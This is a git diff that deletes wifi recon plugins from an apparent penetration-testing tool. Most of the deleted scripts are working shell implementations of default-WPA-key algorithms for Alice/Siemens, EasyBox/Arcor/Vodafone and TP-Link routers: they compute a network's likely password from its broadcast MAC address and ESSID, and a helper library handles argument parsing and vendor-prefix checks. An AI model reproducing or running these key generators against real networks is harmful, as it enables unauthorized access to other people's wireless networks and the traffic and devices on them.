diff options
Diffstat (limited to 'recon/inspect_wifi/plugins')
-rwxr-xr-x | recon/inspect_wifi/plugins/01open | 6 | ||||
-rwxr-xr-x | recon/inspect_wifi/plugins/02alice | 23 | ||||
-rwxr-xr-x | recon/inspect_wifi/plugins/02easybox | 36 | ||||
-rwxr-xr-x | recon/inspect_wifi/plugins/02tplink | 24 | ||||
-rw-r--r-- | recon/inspect_wifi/plugins/plugin_core | 41 |
5 files changed, 0 insertions, 130 deletions
diff --git a/recon/inspect_wifi/plugins/01open b/recon/inspect_wifi/plugins/01open deleted file mode 100755 index 881f47ea..00000000 --- a/recon/inspect_wifi/plugins/01open +++ /dev/null @@ -1,6 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION -if [ "$4" == "[ESS]" ]; then - exit 0 -fi -exit 1 diff --git a/recon/inspect_wifi/plugins/02alice b/recon/inspect_wifi/plugins/02alice deleted file mode 100755 index f30acc3a..00000000 --- a/recon/inspect_wifi/plugins/02alice +++ /dev/null @@ -1,23 +0,0 @@ -#!/bin/sh -# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: -# Based on Poc from -# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html -# -# -# ESSID MAC CHANNEL ENCRYPTION - -cd $(dirname $(readlink -f $0)) -. ./plugin_core - -parse_plugin_args "$@" - -if ! check_vendor_mac $VENDOR_MAC "00255E" ;then - echo "$VENDOR_MAC not affected" - exit 1 -fi - -# printf always makes string to lower, need that for correct md5sum -ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) -TMP=$(printf $ETHMAC | md5sum) -printf ${TMP:0:12} | base64 -exit 0 diff --git a/recon/inspect_wifi/plugins/02easybox b/recon/inspect_wifi/plugins/02easybox deleted file mode 100755 index 58816f25..00000000 --- a/recon/inspect_wifi/plugins/02easybox +++ /dev/null @@ -1,36 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 - -cd $(dirname $(readlink -f $0)) -. ./plugin_core -parse_plugin_args "$@" - -if ! echo "$ESSID" | grep -q '\(EasyBox-\|Arcor-\|Vodafone-\)'; then - echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" - exit 1 -else - # Fill up to 4 places with zeros, if necessary: - deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') - # - # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: - hexi=$(echo ${MAC:8:4} | sed 's/./& /g') - #echo 'M4 (Hex): ' ${hexi[@]} - # K1 = last byte of (d0 + d1 + h2 + h3) - # K2 = last byte of (h0 + h1 + d2 + d3) - c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1}) - c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1}) - K1=$((($c1)%16)) - K2=$((($c2)%16)) - #printf "K1: %x\n" $K1 - #printf "K2: %x\n" $K2 - X1=$((K1^${deci:6:1})) - X2=$((K1^${deci:4:1})) - X3=$((K1^${deci:2:1})) - Y1=$((K2^0x${hexi:2:1})) - Y2=$((K2^0x${hexi:4:1})) - Y3=$((K2^0x${hexi:6:1})) - Z1=$((0x${hexi:4:1}^${deci:6:1})) - Z2=$((0x${hexi:6:1}^${deci:4:1})) - Z3=$((K1^K2)) - printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F -fi diff --git a/recon/inspect_wifi/plugins/02tplink b/recon/inspect_wifi/plugins/02tplink deleted file mode 100755 index 522c0845..00000000 --- a/recon/inspect_wifi/plugins/02tplink +++ /dev/null @@ -1,24 +0,0 @@ -#!/bin/sh -# Implementation of TP-Link default WPA Key -# Based on -# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481 - -cd $(dirname $(readlink -f $0)) -. ./plugin_core - -parse_plugin_args "$@" - -if ! check_vendor_mac $VENDOR_MAC F8D111; then - echo "$VENDOR_MAC not affected" - exit 1 -fi - -if echo "$ESSID" | grep -q '^tp'; then - echo "$ESSID not affected" - exit 1 -fi - - -# printf always makes string to lower, need that for correct md5sum -printf "${MAC:4:12}" -exit 0 diff --git a/recon/inspect_wifi/plugins/plugin_core b/recon/inspect_wifi/plugins/plugin_core deleted file mode 100644 index e79a3c05..00000000 --- a/recon/inspect_wifi/plugins/plugin_core +++ /dev/null @@ -1,41 +0,0 @@ -#!/bin/sh -parse_plugin_args(){ - [ $# -ne 4 ] && plugin_usage && exit 1 - # convenience function to put args in ENV variables - ESSID="$1" - - # mac is returned without colon - MAC=$(printf "%s" "$2" | sed 's/://g') - # split up the mac address to vendor and private part - VENDOR_MAC=${MAC:0:6} - PRIVATE_MAC=${MAC:6:12} - CHANNEL="$3" - ENC="$4" - if [ ${#MAC} -ne 12 ] ;then - echo "MAC malformed" - exit 1 - fi -} -plugin_usage(){ - cat << EOF -usage: $0 ESSID MAC CHANNEL ENC" - - ESSID - string - MAC - 00:11:22:33:44:55 - CHANNEL - 4 - ENC - wpa -EOF - -} - -check_vendor_mac(){ - needle="$(printf $1 | tr '[A-Z]' '[a-z]')" - shift - for i in "$@";do - [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 - done - return 1 -} -check_painmode(){ - test -z "${painmode:-}" && echo "painmode required" && exit 1 -} |